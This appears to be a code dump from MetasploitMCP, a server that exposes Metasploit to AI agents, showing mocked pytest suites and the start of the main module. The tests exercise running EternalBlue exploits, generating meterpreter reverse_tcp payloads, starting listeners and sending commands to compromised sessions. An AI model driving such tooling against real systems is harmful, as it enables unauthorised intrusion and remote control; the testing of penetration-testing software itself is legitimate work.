37 | self.cid = cid
38 |
39 | def read(self):
40 | return {'data': 'test output', 'prompt': 'msf6 > ', 'busy': False}
41 |
42 | def write(self, command):
43 | return True
44 |
45 | class MockMsfRpcError(Exception):
46 | pass
47 |
48 | # Patch the MSF modules
49 | sys.modules['pymetasploit3.msfrpc'].MsfRpcClient = MockMsfRpcClient
50 | sys.modules['pymetasploit3.msfrpc'].MsfConsole = MockMsfConsole
51 | sys.modules['pymetasploit3.msfrpc'].MsfRpcError = MockMsfRpcError
52 |
53 | # Import after mocking
54 | from MetasploitMCP import (
55 | _get_module_object, _set_module_options, initialize_msf_client,
56 | get_msf_client, get_msf_console, run_command_safely,
57 | find_available_port
58 | )
59 |
60 |
61 | class TestMsfClientFunctions:
62 | """Test MSF client initialization and management functions."""
63 |
64 | @patch('MetasploitMCP.MSF_PASSWORD', 'test-password')
65 | @patch('MetasploitMCP.MSF_SERVER', '127.0.0.1')
66 | @patch('MetasploitMCP.MSF_PORT_STR', '55553')
67 | @patch('MetasploitMCP.MSF_SSL_STR', 'false')
68 | def test_initialize_msf_client_success(self):
69 | """Test successful MSF client initialization."""
70 | with patch('MetasploitMCP._msf_client_instance', None):
71 | with patch('MetasploitMCP.MsfRpcClient') as mock_client_class:
72 | mock_client = Mock()
73 | mock_client.core.version = {'version': '6.3.0'}
74 | mock_client_class.return_value = mock_client
75 |
76 | result = initialize_msf_client()
77 |
78 | assert result is mock_client
79 | mock_client_class.assert_called_once_with(
80 | password='test-password',
81 | server='127.0.0.1',
82 | port=55553,
83 | ssl=False
84 | )
85 |
86 | @patch('MetasploitMCP.MSF_PORT_STR', 'invalid-port')
87 | def test_initialize_msf_client_invalid_port(self):
88 | """Test MSF client initialization with invalid port."""
89 | with patch('MetasploitMCP._msf_client_instance', None):
90 | with pytest.raises(ValueError, match="Invalid MSF connection parameters"):
91 | initialize_msf_client()
92 |
93 | def test_get_msf_client_not_initialized(self):
94 | """Test get_msf_client when client not initialized."""
95 | with patch('MetasploitMCP._msf_client_instance', None):
96 | with pytest.raises(ConnectionError, match="not been initialized"):
97 | get_msf_client()
98 |
99 | def test_get_msf_client_initialized(self):
100 | """Test get_msf_client when client is initialized."""
101 | mock_client = Mock()
102 | with patch('MetasploitMCP._msf_client_instance', mock_client):
103 | result = get_msf_client()
104 | assert result is mock_client
105 |
106 |
107 | class TestGetModuleObject:
108 | """Test the _get_module_object helper function."""
109 |
110 | @pytest.fixture
111 | def mock_client(self):
112 | """Fixture providing a mock MSF client."""
113 | client = Mock()
114 | with patch('MetasploitMCP.get_msf_client', return_value=client):
115 | yield client
116 |
117 | @pytest.mark.asyncio
118 | async def test_get_module_object_success(self, mock_client):
119 | """Test successful module object retrieval."""
120 | mock_module = Mock()
121 | mock_client.modules.use.return_value = mock_module
122 |
123 | result = await _get_module_object('exploit', 'windows/smb/ms17_010_eternalblue')
124 |
125 | assert result is mock_module
126 | mock_client.modules.use.assert_called_once_with('exploit', 'windows/smb/ms17_010_eternalblue')
127 |
128 | @pytest.mark.asyncio
129 | async def test_get_module_object_full_path(self, mock_client):
130 | """Test module object retrieval with full path."""
131 | mock_module = Mock()
132 | mock_client.modules.use.return_value = mock_module
133 |
134 | result = await _get_module_object('exploit', 'exploit/windows/smb/ms17_010_eternalblue')
135 |
136 | assert result is mock_module
137 | # Should strip the module type prefix
138 | mock_client.modules.use.assert_called_once_with('exploit', 'windows/smb/ms17_010_eternalblue')
139 |
140 | @pytest.mark.asyncio
141 | async def test_get_module_object_not_found(self, mock_client):
142 | """Test module object retrieval when module not found."""
143 | mock_client.modules.use.side_effect = KeyError("Module not found")
144 |
145 | with pytest.raises(ValueError, match="not found"):
146 | await _get_module_object('exploit', 'nonexistent/module')
147 |
148 | @pytest.mark.asyncio
149 | async def test_get_module_object_msf_error(self, mock_client):
150 | """Test module object retrieval with MSF RPC error."""
151 | mock_client.modules.use.side_effect = MockMsfRpcError("RPC Error")
152 |
153 | with pytest.raises(MockMsfRpcError, match="RPC Error"):
154 | await _get_module_object('exploit', 'test/module')
155 |
156 |
157 | class TestSetModuleOptions:
158 | """Test the _set_module_options helper function."""
159 |
160 | @pytest.fixture
161 | def mock_module(self):
162 | """Fixture providing a mock module object."""
163 | module = Mock()
164 | module.fullname = 'exploit/test/module'
165 | module.__setitem__ = Mock()
166 | return module
167 |
168 | @pytest.mark.asyncio
169 | async def test_set_module_options_basic(self, mock_module):
170 | """Test basic option setting."""
171 | options = {'RHOSTS': '192.168.1.1', 'RPORT': '80'}
172 |
173 | await _set_module_options(mock_module, options)
174 |
175 | # Should be called twice, once for each option
176 | assert mock_module.__setitem__.call_count == 2
177 | mock_module.__setitem__.assert_any_call('RHOSTS', '192.168.1.1')
178 | mock_module.__setitem__.assert_any_call('RPORT', 80) # Type conversion: '80' -> 80
179 |
180 | @pytest.mark.asyncio
181 | async def test_set_module_options_type_conversion(self, mock_module):
182 | """Test option setting with type conversion."""
183 | options = {
184 | 'RPORT': '80', # String number -> int
185 | 'SSL': 'true', # String boolean -> bool
186 | 'VERBOSE': 'false', # String boolean -> bool
187 | 'THREADS': '10' # String number -> int
188 | }
189 |
190 | await _set_module_options(mock_module, options)
191 |
192 | # Verify type conversions
193 | calls = mock_module.__setitem__.call_args_list
194 | call_dict = {call[0][0]: call[0][1] for call in calls}
195 |
196 | assert call_dict['RPORT'] == 80
197 | assert call_dict['SSL'] is True
198 | assert call_dict['VERBOSE'] is False
199 | assert call_dict['THREADS'] == 10
200 |
201 | @pytest.mark.asyncio
202 | async def test_set_module_options_error(self, mock_module):
203 | """Test option setting with error."""
204 | mock_module.__setitem__.side_effect = KeyError("Invalid option")
205 | options = {'INVALID_OPT': 'value'}
206 |
207 | with pytest.raises(ValueError, match="Failed to set option"):
208 | await _set_module_options(mock_module, options)
209 |
210 |
211 | class TestGetMsfConsole:
212 | """Test the get_msf_console context manager."""
213 |
214 | @pytest.fixture
215 | def mock_client(self):
216 | """Fixture providing a mock MSF client."""
217 | client = Mock()
218 | with patch('MetasploitMCP.get_msf_client', return_value=client):
219 | yield client
220 |
221 | @pytest.mark.asyncio
222 | async def test_get_msf_console_success(self, mock_client):
223 | """Test successful console creation and cleanup."""
224 | mock_console = MockMsfConsole('test-console-123')
225 | mock_client.consoles.console.return_value = mock_console
226 | mock_client.consoles.destroy.return_value = 'destroyed'
227 |
228 | # Mock the global client instance for cleanup
229 | with patch('MetasploitMCP._msf_client_instance', mock_client):
230 | async with get_msf_console() as console:
231 | assert console is mock_console
232 | assert console.cid == 'test-console-123'
233 |
234 | # Verify cleanup was called
235 | mock_client.consoles.destroy.assert_called_once_with('test-console-123')
236 |
237 | @pytest.mark.asyncio
238 | async def test_get_msf_console_creation_error(self, mock_client):
239 | """Test console creation error handling."""
240 | mock_client.consoles.console.side_effect = MockMsfRpcError("Console creation failed")
241 |
242 | with pytest.raises(MockMsfRpcError, match="Console creation failed"):
243 | async with get_msf_console() as console:
244 | pass
245 |
246 | @pytest.mark.asyncio
247 | async def test_get_msf_console_cleanup_error(self, mock_client):
248 | """Test that cleanup errors don't propagate."""
249 | mock_console = MockMsfConsole('test-console-123')
250 | mock_client.consoles.console.return_value = mock_console
251 | mock_client.consoles.destroy.side_effect = Exception("Cleanup failed")
252 |
253 | # Should not raise exception even if cleanup fails
254 | async with get_msf_console() as console:
255 | assert console is mock_console
256 |
257 |
258 | class TestRunCommandSafely:
259 | """Test the run_command_safely function."""
260 |
261 | @pytest.fixture
262 | def mock_console(self):
263 | """Fixture providing a mock console."""
264 | console = Mock()
265 | console.write = Mock()
266 | console.read = Mock()
267 | return console
268 |
269 | @pytest.mark.asyncio
270 | async def test_run_command_safely_basic(self, mock_console):
271 | """Test basic command execution."""
272 | # Mock console read to return prompt immediately
273 | mock_console.read.return_value = {
274 | 'data': 'command output\n',
275 | 'prompt': '\x01\x02msf6\x01\x02 \x01\x02> \x01\x02',
276 | 'busy': False
277 | }
278 |
279 | result = await run_command_safely(mock_console, 'help')
280 |
281 | mock_console.write.assert_called_once_with('help\n')
282 | assert 'command output' in result
283 |
284 | @pytest.mark.asyncio
285 | async def test_run_command_safely_invalid_console(self, mock_console):
286 | """Test command execution with invalid console."""
287 | # Remove required methods
288 | delattr(mock_console, 'write')
289 |
290 | with pytest.raises(TypeError, match="Unsupported console object"):
291 | await run_command_safely(mock_console, 'help')
292 |
293 | @pytest.mark.asyncio
294 | async def test_run_command_safely_read_error(self, mock_console):
295 | """Test command execution with read error - should timeout gracefully."""
296 | mock_console.read.side_effect = Exception("Read failed")
297 |
298 | # Should not raise exception, but timeout and return empty result
299 | result = await run_command_safely(mock_console, 'help')
300 |
301 | # Should return empty string after timeout
302 | assert isinstance(result, str)
303 | assert result == "" # Empty result after timeout
304 |
305 |
306 | class TestFindAvailablePort:
307 | """Test the find_available_port utility function."""
308 |
309 | def test_find_available_port_success(self):
310 | """Test finding an available port."""
311 | # This should succeed as it tests real socket binding
312 | port = find_available_port(8080, max_attempts=5)
313 | assert isinstance(port, int)
314 | assert 8080 <= port < 8085
315 |
316 | @patch('socket.socket')
317 | def test_find_available_port_all_busy(self, mock_socket_class):
318 | """Test when all ports in range are busy."""
319 | mock_socket = Mock()
320 | mock_socket_class.return_value.__enter__.return_value = mock_socket
321 | mock_socket.bind.side_effect = OSError("Port in use")
322 |
323 | # Should return the start port as fallback
324 | port = find_available_port(8080, max_attempts=3)
325 | assert port == 8080
326 |
327 | @patch('socket.socket')
328 | def test_find_available_port_second_attempt(self, mock_socket_class):
329 | """Test finding port on second attempt."""
330 | mock_socket = Mock()
331 | mock_socket_class.return_value.__enter__.return_value = mock_socket
332 |
333 | # First call fails, second succeeds
334 | mock_socket.bind.side_effect = [OSError("Port in use"), None]
335 |
336 | port = find_available_port(8080, max_attempts=3)
337 | assert port == 8081
338 |
339 |
340 | if __name__ == "__main__":
341 | pytest.main([__file__, "-v"])
342 |
```
--------------------------------------------------------------------------------
/tests/test_tools_integration.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Integration tests for MCP tools in MetasploitMCP.
4 | These tests mock the Metasploit backend but test the full tool workflows.
5 | """
6 |
7 | import pytest
8 | import sys
9 | import os
10 | import asyncio
11 | from unittest.mock import Mock, patch, AsyncMock, MagicMock
12 | from typing import Dict, Any
13 |
14 | # Add the parent directory to the path to import MetasploitMCP
15 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
16 |
17 | # Mock the dependencies that aren't available in test environment
18 | sys.modules['uvicorn'] = Mock()
19 | sys.modules['fastapi'] = Mock()
20 | sys.modules['starlette.applications'] = Mock()
21 | sys.modules['starlette.routing'] = Mock()
22 |
23 | # Create a special mock for FastMCP that preserves the tool decorator behavior
24 | class MockFastMCP:
25 | def __init__(self, *args, **kwargs):
26 | pass
27 |
28 | def tool(self):
29 | # Return a decorator that just returns the original function
30 | def decorator(func):
31 | return func
32 | return decorator
33 |
34 | # Mock the MCP modules with our custom FastMCP
35 | mcp_server_fastmcp = Mock()
36 | mcp_server_fastmcp.FastMCP = MockFastMCP
37 | sys.modules['mcp.server.fastmcp'] = mcp_server_fastmcp
38 | sys.modules['mcp.server.sse'] = Mock()
39 | sys.modules['mcp.server.session'] = Mock()
40 |
41 | # Mock pymetasploit3 module
42 | sys.modules['pymetasploit3.msfrpc'] = Mock()
43 |
44 | # Create comprehensive mock classes
45 | class MockMsfRpcClient:
46 | def __init__(self):
47 | self.modules = Mock()
48 | self.core = Mock()
49 | self.sessions = Mock()
50 | self.jobs = Mock()
51 | self.consoles = Mock()
52 |
53 | # Setup default behaviors
54 | self.core.version = {'version': '6.3.0'}
55 | # These are properties that return lists
56 | self.modules.exploits = ['windows/smb/ms17_010_eternalblue', 'unix/ftp/vsftpd_234_backdoor']
57 | self.modules.payloads = ['windows/meterpreter/reverse_tcp', 'linux/x86/shell/reverse_tcp']
58 | # These are methods that return dicts
59 | self.sessions.list = Mock(return_value={})
60 | self.jobs.list = Mock(return_value={})
61 |
62 | class MockMsfConsole:
63 | def __init__(self, cid='test-console-id'):
64 | self.cid = cid
65 | self._command_history = []
66 |
67 | def read(self):
68 | return {'data': 'msf6 > ', 'prompt': '\x01\x02msf6\x01\x02 \x01\x02> \x01\x02', 'busy': False}
69 |
70 | def write(self, command):
71 | self._command_history.append(command.strip())
72 | return True
73 |
74 | class MockMsfModule:
75 | def __init__(self, fullname):
76 | self.fullname = fullname
77 | self.options = {}
78 | # Create a proper mock for runoptions that supports __setitem__
79 | self.runoptions = {}
80 | self.missing_required = []
81 |
82 | def __setitem__(self, key, value):
83 | self.options[key] = value
84 |
85 | def execute(self, payload=None):
86 | return {
87 | 'job_id': 1234,
88 | 'uuid': 'test-uuid-123',
89 | 'error': False
90 | }
91 |
92 | def payload_generate(self):
93 | return b"test_payload_bytes"
94 |
95 | class MockMsfRpcError(Exception):
96 | pass
97 |
98 | # Apply mocks
99 | sys.modules['pymetasploit3.msfrpc'].MsfRpcClient = MockMsfRpcClient
100 | sys.modules['pymetasploit3.msfrpc'].MsfConsole = MockMsfConsole
101 | sys.modules['pymetasploit3.msfrpc'].MsfRpcError = MockMsfRpcError
102 |
103 | # Import the module and then get the actual functions
104 | import MetasploitMCP
105 |
106 | # Get the actual functions (not mocked)
107 | list_exploits = MetasploitMCP.list_exploits
108 | list_payloads = MetasploitMCP.list_payloads
109 | generate_payload = MetasploitMCP.generate_payload
110 | run_exploit = MetasploitMCP.run_exploit
111 | run_post_module = MetasploitMCP.run_post_module
112 | run_auxiliary_module = MetasploitMCP.run_auxiliary_module
113 | list_active_sessions = MetasploitMCP.list_active_sessions
114 | send_session_command = MetasploitMCP.send_session_command
115 | start_listener = MetasploitMCP.start_listener
116 | stop_job = MetasploitMCP.stop_job
117 | terminate_session = MetasploitMCP.terminate_session
118 |
119 |
120 | class TestExploitListingTools:
121 | """Test tools for listing exploits and payloads."""
122 |
123 | @pytest.fixture
124 | def mock_client(self):
125 | """Fixture providing a mock MSF client."""
126 | client = MockMsfRpcClient()
127 | with patch('MetasploitMCP.get_msf_client', return_value=client):
128 | yield client
129 |
130 | @pytest.mark.asyncio
131 | async def test_list_exploits_no_filter(self, mock_client):
132 | """Test listing exploits without filter."""
133 | mock_client.modules.exploits = [
134 | 'windows/smb/ms17_010_eternalblue',
135 | 'unix/ftp/vsftpd_234_backdoor',
136 | 'windows/http/iis_webdav_upload_asp'
137 | ]
138 |
139 | result = await list_exploits()
140 |
141 | assert isinstance(result, list)
142 | assert len(result) == 3
143 | assert 'windows/smb/ms17_010_eternalblue' in result
144 |
145 | @pytest.mark.asyncio
146 | async def test_list_exploits_with_filter(self, mock_client):
147 | """Test listing exploits with search term."""
148 | mock_client.modules.exploits = [
149 | 'windows/smb/ms17_010_eternalblue',
150 | 'unix/ftp/vsftpd_234_backdoor',
151 | 'windows/smb/ms08_067_netapi'
152 | ]
153 |
154 | result = await list_exploits("smb")
155 |
156 | assert isinstance(result, list)
157 | assert len(result) == 2
158 | assert all('smb' in exploit.lower() for exploit in result)
159 |
160 | @pytest.mark.asyncio
161 | async def test_list_exploits_error(self, mock_client):
162 | """Test listing exploits with MSF error."""
163 | mock_client.modules.exploits = Mock(side_effect=MockMsfRpcError("Connection failed"))
164 |
165 | result = await list_exploits()
166 |
167 | assert isinstance(result, list)
168 | assert len(result) == 1
169 | assert "Error" in result[0]
170 |
171 | @pytest.mark.asyncio
172 | async def test_list_exploits_timeout(self, mock_client):
173 | """Test listing exploits with timeout."""
174 | import asyncio
175 |
176 | def slow_exploits():
177 | # Simulate a slow response that would timeout
178 | import time
179 | time.sleep(35) # Longer than RPC_CALL_TIMEOUT (30s)
180 | return ['exploit1', 'exploit2']
181 |
182 | mock_client.modules.exploits = slow_exploits
183 |
184 | result = await list_exploits()
185 |
186 | assert isinstance(result, list)
187 | assert len(result) == 1
188 | assert "Timeout" in result[0]
189 | assert "30" in result[0] # Should mention the timeout duration
190 |
191 | @pytest.mark.asyncio
192 | async def test_list_payloads_no_filter(self, mock_client):
193 | """Test listing payloads without filter."""
194 | mock_client.modules.payloads = [
195 | 'windows/meterpreter/reverse_tcp',
196 | 'linux/x86/shell/reverse_tcp',
197 | 'windows/shell/reverse_tcp'
198 | ]
199 |
200 | result = await list_payloads()
201 |
202 | assert isinstance(result, list)
203 | assert len(result) == 3
204 |
205 | @pytest.mark.asyncio
206 | async def test_list_payloads_with_platform_filter(self, mock_client):
207 | """Test listing payloads with platform filter."""
208 | mock_client.modules.payloads = [
209 | 'windows/meterpreter/reverse_tcp',
210 | 'linux/x86/shell/reverse_tcp',
211 | 'windows/shell/reverse_tcp'
212 | ]
213 |
214 | result = await list_payloads(platform="windows")
215 |
216 | assert isinstance(result, list)
217 | assert len(result) == 2
218 | assert all('windows' in payload.lower() for payload in result)
219 |
220 | @pytest.mark.asyncio
221 | async def test_list_payloads_with_arch_filter(self, mock_client):
222 | """Test listing payloads with architecture filter."""
223 | mock_client.modules.payloads = [
224 | 'windows/meterpreter/reverse_tcp',
225 | 'linux/x86/shell/reverse_tcp',
226 | 'windows/x64/meterpreter/reverse_tcp'
227 | ]
228 |
229 | result = await list_payloads(arch="x86")
230 |
231 | assert isinstance(result, list)
232 | assert len(result) == 1
233 | assert 'x86' in result[0]
234 |
235 |
236 | class TestPayloadGeneration:
237 | """Test payload generation functionality."""
238 |
239 | @pytest.fixture
240 | def mock_client_and_module(self):
241 | """Fixture providing mocked client and module."""
242 | client = MockMsfRpcClient()
243 | module = MockMsfModule('payload/windows/meterpreter/reverse_tcp')
244 |
245 | with patch('MetasploitMCP.get_msf_client', return_value=client):
246 | with patch('MetasploitMCP._get_module_object', return_value=module):
247 | with patch('MetasploitMCP.PAYLOAD_SAVE_DIR', '/tmp/test'):
248 | with patch('os.makedirs'):
249 | with patch('builtins.open', create=True) as mock_open:
250 | mock_open.return_value.__enter__.return_value.write = Mock()
251 | yield client, module
252 |
253 | @pytest.mark.asyncio
254 | async def test_generate_payload_dict_options(self, mock_client_and_module):
255 | """Test payload generation with dictionary options."""
256 | client, module = mock_client_and_module
257 |
258 | options = {"LHOST": "192.168.1.100", "LPORT": 4444}
259 | result = await generate_payload(
260 | payload_type="windows/meterpreter/reverse_tcp",
261 | format_type="exe",
262 | options=options
263 | )
264 |
265 | assert result["status"] == "success"
266 | assert "server_save_path" in result
267 | assert result["payload_size"] == len(b"test_payload_bytes")
268 |
269 | @pytest.mark.asyncio
270 | async def test_generate_payload_string_options(self, mock_client_and_module):
271 | """Test payload generation with string options."""
272 | client, module = mock_client_and_module
273 |
274 | options = "LHOST=192.168.1.100,LPORT=4444"
275 | result = await generate_payload(
276 | payload_type="windows/meterpreter/reverse_tcp",
277 | format_type="exe",
278 | options=options
279 | )
280 |
281 | assert result["status"] == "success"
282 | # Verify the options were parsed correctly
283 | assert module.options["LHOST"] == "192.168.1.100"
284 | assert module.options["LPORT"] == 4444
285 |
286 | @pytest.mark.asyncio
287 | async def test_generate_payload_empty_options(self, mock_client_and_module):
288 | """Test payload generation with empty options."""
289 | client, module = mock_client_and_module
290 |
291 | result = await generate_payload(
292 | payload_type="windows/meterpreter/reverse_tcp",
293 | format_type="exe",
294 | options={}
295 | )
296 |
297 | assert result["status"] == "error"
298 | assert "required" in result["message"]
299 |
300 | @pytest.mark.asyncio
301 | async def test_generate_payload_invalid_string_options(self, mock_client_and_module):
302 | """Test payload generation with invalid string options."""
303 | client, module = mock_client_and_module
304 |
305 | result = await generate_payload(
306 | payload_type="windows/meterpreter/reverse_tcp",
307 | format_type="exe",
308 | options="LHOST192.168.1.100" # Missing equals
309 | )
310 |
311 | assert result["status"] == "error"
312 | assert "Invalid options format" in result["message"]
313 |
314 |
315 | class TestExploitExecution:
316 | """Test exploit execution functionality."""
317 |
318 | @pytest.fixture
319 | def mock_exploit_environment(self):
320 | """Fixture providing mocked exploit execution environment."""
321 | client = MockMsfRpcClient()
322 | module = MockMsfModule('exploit/windows/smb/ms17_010_eternalblue')
323 |
324 | with patch('MetasploitMCP.get_msf_client', return_value=client):
325 | with patch('MetasploitMCP._execute_module_rpc') as mock_rpc:
326 | with patch('MetasploitMCP._execute_module_console') as mock_console:
327 | mock_rpc.return_value = {
328 | "status": "success",
329 | "message": "Exploit executed",
330 | "job_id": 1234,
331 | "session_id": 5678
332 | }
333 | mock_console.return_value = {
334 | "status": "success",
335 | "message": "Exploit executed via console",
336 | "module_output": "Session 1 opened"
337 | }
338 | yield client, mock_rpc, mock_console
339 |
340 | @pytest.mark.asyncio
341 | async def test_run_exploit_dict_payload_options(self, mock_exploit_environment):
342 | """Test exploit execution with dictionary payload options."""
343 | client, mock_rpc, mock_console = mock_exploit_environment
344 |
345 | result = await run_exploit(
346 | module_name="windows/smb/ms17_010_eternalblue",
347 | options={"RHOSTS": "192.168.1.1"},
348 | payload_name="windows/meterpreter/reverse_tcp",
349 | payload_options={"LHOST": "192.168.1.100", "LPORT": 4444},
350 | run_as_job=True
351 | )
352 |
353 | assert result["status"] == "success"
354 | mock_rpc.assert_called_once()
355 |
356 | @pytest.mark.asyncio
357 | async def test_run_exploit_string_payload_options(self, mock_exploit_environment):
358 | """Test exploit execution with string payload options."""
359 | client, mock_rpc, mock_console = mock_exploit_environment
360 |
361 | result = await run_exploit(
362 | module_name="windows/smb/ms17_010_eternalblue",
363 | options={"RHOSTS": "192.168.1.1"},
364 | payload_name="windows/meterpreter/reverse_tcp",
365 | payload_options="LHOST=192.168.1.100,LPORT=4444",
366 | run_as_job=True
367 | )
368 |
369 | assert result["status"] == "success"
370 | # Verify RPC was called with parsed options
371 | call_args = mock_rpc.call_args
372 | payload_spec = call_args[1]['payload_spec']
373 | assert payload_spec['options']['LHOST'] == "192.168.1.100"
374 | assert payload_spec['options']['LPORT'] == 4444
375 |
376 | @pytest.mark.asyncio
377 | async def test_run_exploit_invalid_payload_options(self, mock_exploit_environment):
378 | """Test exploit execution with invalid payload options."""
379 | client, mock_rpc, mock_console = mock_exploit_environment
380 |
381 | result = await run_exploit(
382 | module_name="windows/smb/ms17_010_eternalblue",
383 | options={"RHOSTS": "192.168.1.1"},
384 | payload_name="windows/meterpreter/reverse_tcp",
385 | payload_options="LHOST192.168.1.100", # Invalid format
386 | run_as_job=True
387 | )
388 |
389 | assert result["status"] == "error"
390 | assert "Invalid payload_options format" in result["message"]
391 |
392 | @pytest.mark.asyncio
393 | async def test_run_exploit_console_mode(self, mock_exploit_environment):
394 | """Test exploit execution in console mode."""
395 | client, mock_rpc, mock_console = mock_exploit_environment
396 |
397 | result = await run_exploit(
398 | module_name="windows/smb/ms17_010_eternalblue",
399 | options={"RHOSTS": "192.168.1.1"},
400 | payload_name="windows/meterpreter/reverse_tcp",
401 | payload_options={"LHOST": "192.168.1.100", "LPORT": 4444},
402 | run_as_job=False # Console mode
403 | )
404 |
405 | assert result["status"] == "success"
406 | mock_console.assert_called_once()
407 | mock_rpc.assert_not_called()
408 |
409 |
410 | class TestSessionManagement:
411 | """Test session management functionality."""
412 |
413 | @pytest.fixture
414 | def mock_session_environment(self):
415 | """Fixture providing mocked session management environment."""
416 | client = MockMsfRpcClient()
417 | session = Mock()
418 | session.run_with_output = Mock(return_value="command output")
419 | session.read = Mock(return_value="session data")
420 | session.write = Mock()
421 | session.stop = Mock()
422 |
423 | # Override the default Mock with actual dict return values
424 | client.sessions.list = Mock(return_value={
425 | "1": {"type": "meterpreter", "info": "Windows session"},
426 | "2": {"type": "shell", "info": "Linux session"}
427 | })
428 | client.sessions.session = Mock(return_value=session)
429 |
430 | with patch('MetasploitMCP.get_msf_client', return_value=client):
431 | yield client, session
432 |
433 | @pytest.mark.asyncio
434 | async def test_list_active_sessions(self, mock_session_environment):
435 | """Test listing active sessions."""
436 | client, session = mock_session_environment
437 |
438 | result = await list_active_sessions()
439 |
440 | assert result["status"] == "success"
441 | assert result["count"] == 2
442 | assert "1" in result["sessions"]
443 | assert "2" in result["sessions"]
444 |
445 | @pytest.mark.asyncio
446 | async def test_send_session_command_meterpreter(self, mock_session_environment):
447 | """Test sending command to Meterpreter session."""
448 | client, session = mock_session_environment
449 |
450 | result = await send_session_command(1, "sysinfo")
451 |
452 | assert result["status"] == "success"
453 | session.run_with_output.assert_called_once_with("sysinfo")
454 |
455 | @pytest.mark.asyncio
456 | async def test_send_session_command_nonexistent(self, mock_session_environment):
457 | """Test sending command to non-existent session."""
458 | client, session = mock_session_environment
459 | client.sessions.list.return_value = {} # No sessions
460 |
461 | result = await send_session_command(999, "whoami")
462 |
463 | assert result["status"] == "error"
464 | assert "not found" in result["message"]
465 |
466 | @pytest.mark.asyncio
467 | async def test_terminate_session(self, mock_session_environment):
468 | """Test session termination."""
469 | client, session = mock_session_environment
470 |
471 | # Mock session disappearing after termination
472 | client.sessions.list.side_effect = [
473 | {"1": {"type": "meterpreter"}}, # Before termination
474 | {} # After termination
475 | ]
476 |
477 | result = await terminate_session(1)
478 |
479 | assert result["status"] == "success"
480 | session.stop.assert_called_once()
481 |
482 |
483 | class TestListenerManagement:
484 | """Test listener and job management functionality."""
485 |
486 | @pytest.fixture
487 | def mock_job_environment(self):
488 | """Fixture providing mocked job management environment."""
489 | client = MockMsfRpcClient()
490 |
491 | # Override the default Mock with actual dict return values
492 | client.jobs.list = Mock(return_value={})
493 | client.jobs.stop = Mock(return_value="stopped")
494 |
495 | with patch('MetasploitMCP.get_msf_client', return_value=client):
496 | with patch('MetasploitMCP._execute_module_rpc') as mock_rpc:
497 | mock_rpc.return_value = {
498 | "status": "success",
499 | "job_id": 1234,
500 | "message": "Listener started"
501 | }
502 | yield client, mock_rpc
503 |
504 | @pytest.mark.asyncio
505 | async def test_start_listener_dict_options(self, mock_job_environment):
506 | """Test starting listener with dictionary additional options."""
507 | client, mock_rpc = mock_job_environment
508 |
509 | result = await start_listener(
510 | payload_type="windows/meterpreter/reverse_tcp",
511 | lhost="192.168.1.100",
512 | lport=4444,
513 | additional_options={"ExitOnSession": True}
514 | )
515 |
516 | assert result["status"] == "success"
517 | assert "job" in result["message"]
518 |
519 | @pytest.mark.asyncio
520 | async def test_start_listener_string_options(self, mock_job_environment):
521 | """Test starting listener with string additional options."""
522 | client, mock_rpc = mock_job_environment
523 |
524 | result = await start_listener(
525 | payload_type="windows/meterpreter/reverse_tcp",
526 | lhost="192.168.1.100",
527 | lport=4444,
528 | additional_options="ExitOnSession=true,Verbose=false"
529 | )
530 |
531 | assert result["status"] == "success"
532 | # Verify RPC was called with parsed options
533 | call_args = mock_rpc.call_args
534 | payload_spec = call_args[1]['payload_spec']
535 | assert payload_spec['options']['ExitOnSession'] is True
536 | assert payload_spec['options']['Verbose'] is False
537 |
538 | @pytest.mark.asyncio
539 | async def test_start_listener_invalid_port(self, mock_job_environment):
540 | """Test starting listener with invalid port."""
541 | client, mock_rpc = mock_job_environment
542 |
543 | result = await start_listener(
544 | payload_type="windows/meterpreter/reverse_tcp",
545 | lhost="192.168.1.100",
546 | lport=99999 # Invalid port
547 | )
548 |
549 | assert result["status"] == "error"
550 | assert "Invalid LPORT" in result["message"]
551 |
552 | @pytest.mark.asyncio
553 | async def test_stop_job(self, mock_job_environment):
554 | """Test stopping a job."""
555 | client, mock_rpc = mock_job_environment
556 |
557 | # Mock job exists before stop, gone after stop
558 | client.jobs.list.side_effect = [
559 | {"1234": {"name": "Handler Job"}}, # Before stop
560 | {} # After stop
561 | ]
562 | client.jobs.stop.return_value = "stopped"
563 |
564 | result = await stop_job(1234)
565 |
566 | assert result["status"] == "success"
567 | client.jobs.stop.assert_called_once_with("1234")
568 |
569 |
570 | if __name__ == "__main__":
571 | pytest.main([__file__, "-v"])
572 |
```
--------------------------------------------------------------------------------
/MetasploitMCP.py:
--------------------------------------------------------------------------------
```python
1 | # -*- coding: utf-8 -*-
2 | import asyncio
3 | import base64
4 | import contextlib
5 | import logging
6 | import os
7 | import pathlib
8 | import re
9 | import shlex
10 | import socket
11 | import subprocess
12 | import sys
13 | from datetime import datetime
14 | from typing import Any, Dict, List, Optional, Tuple, Union
15 |
16 | # --- Third-party Libraries ---
17 | import uvicorn
18 | from fastapi import FastAPI, HTTPException, Request, Response
19 | from mcp.server.fastmcp import FastMCP
20 | from mcp.server.sse import SseServerTransport
21 | from pymetasploit3.msfrpc import MsfConsole, MsfRpcClient, MsfRpcError
22 | from starlette.applications import Starlette
23 | from starlette.routing import Mount, Route, Router
24 |
25 | # --- Configuration & Constants ---
26 |
27 | logging.basicConfig(
28 | level=os.environ.get("LOG_LEVEL", "INFO").upper(),
29 | format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
30 | )
31 | logger = logging.getLogger("metasploit_mcp_server")
32 | session_shell_type: Dict[str, str] = {}
33 |
34 | # Metasploit Connection Config (from environment variables)
35 | MSF_PASSWORD = os.getenv('MSF_PASSWORD', 'yourpassword')
36 | MSF_SERVER = os.getenv('MSF_SERVER', '127.0.0.1')
37 | MSF_PORT_STR = os.getenv('MSF_PORT', '55553')
38 | MSF_SSL_STR = os.getenv('MSF_SSL', 'false')
39 | PAYLOAD_SAVE_DIR = os.environ.get('PAYLOAD_SAVE_DIR', str(pathlib.Path.home() / "payloads"))
40 |
41 | # Timeouts and Polling Intervals (in seconds)
42 | DEFAULT_CONSOLE_READ_TIMEOUT = 15 # Default for quick console commands
43 | LONG_CONSOLE_READ_TIMEOUT = 60 # For commands like run/exploit/check
44 | SESSION_COMMAND_TIMEOUT = 60 # Default for commands within sessions
45 | SESSION_READ_INACTIVITY_TIMEOUT = 10 # Timeout if no data from session
46 | EXPLOIT_SESSION_POLL_TIMEOUT = 60 # Max time to wait for session after exploit job
47 | EXPLOIT_SESSION_POLL_INTERVAL = 2 # How often to check for session
